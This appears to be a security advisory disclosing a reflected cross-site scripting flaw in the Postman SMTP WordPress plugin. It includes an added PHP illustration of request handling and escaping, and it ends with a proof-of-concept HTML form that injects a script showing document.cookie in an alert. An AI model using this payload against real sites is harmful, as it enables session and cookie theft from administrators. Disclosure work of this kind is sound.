We recently found that the plugin Postman SMTP contains a reflected cross-site scripting (XSS) vulnerability.
On line 346 of the file /Postman/Postman-Email-Log/PostmanEmailLogController.php, the value of the GET or POST input “page” is output without being escaped:
value="<?php echo $_REQUEST['page'] ?>" />
While the GET input “page” needs to be set to “postman_email_log” for that code to run, the POST input can be set to another value and depending on the configuration of PHP will be the one chosen to be output.
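As an added illustration (not the plugin's code), the following standalone PHP script reproduces the two points above: how PHP fills $_REQUEST from GET and POST in the order given by request_order (or variables_order), and the difference between echoing the value raw and escaping it with WordPress's esc_attr() before it lands in an attribute. The function names build_request, hidden_field_vulnerable and hidden_field_fixed are hypothetical, the request values are constructed samples, and a stand-in esc_attr() is defined only so the script runs outside WordPress.

```php
<?php
// Added example, not the plugin's code. Simulates how PHP builds $_REQUEST:
// the sources listed in request_order (or variables_order when request_order
// is empty) are merged left to right, so a later source overrides an earlier
// one. With the common setting "GP", a POST "page" replaces the GET "page".
function build_request(array $get, array $post, string $order): array
{
    $request = [];
    foreach (str_split(strtoupper($order)) as $source) {
        if ($source === 'G') {
            $request = array_merge($request, $get);
        } elseif ($source === 'P') {
            $request = array_merge($request, $post);
        }
    }
    return $request;
}

// Stand-in for WordPress's esc_attr() so this runs outside WordPress.
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string
    {
        return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    }
}

// The pattern from the advisory: the value goes into an attribute unescaped.
function hidden_field_vulnerable(array $request): string
{
    return 'value="' . $request['page'] . '" />';
}

// Hardened form: read the value from the source the routing check actually
// used (GET) and escape it for an HTML attribute context before output.
function hidden_field_fixed(array $get): string
{
    return 'value="' . esc_attr($get['page'] ?? '') . '" />';
}

// Constructed sample request: GET selects the log page, POST carries a marker.
$get   = ['page' => 'postman_email_log'];
$post  = ['page' => '"><b>injected</b>'];
$order = ini_get('request_order') ?: ini_get('variables_order');
$request = build_request($get, $post, $order ?: 'GP');

echo "order in effect: {$order}\n";
echo "vulnerable: " . hidden_field_vulnerable($request) . "\n"; // marker breaks out of the attribute
echo "fixed:      " . hidden_field_fixed($get) . "\n";          // value stays inside the attribute
```

Run it with `php example.php`; the vulnerable line shows the POST value closing the attribute, while the fixed line keeps the GET value inside it.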
The website of the developer is down and we couldn’t find any other method to contact them directly. The plugin was last updated 16 months ago and is only listed as being compatible up to WordPress 4.4, so it doesn’t look like it is being maintained at this time.
Proof of Concept
The following proof of concept will cause any available cookies to be shown in an alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/tools.php?page=postman_email_log" method="POST">
<input type="hidden" name="page" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>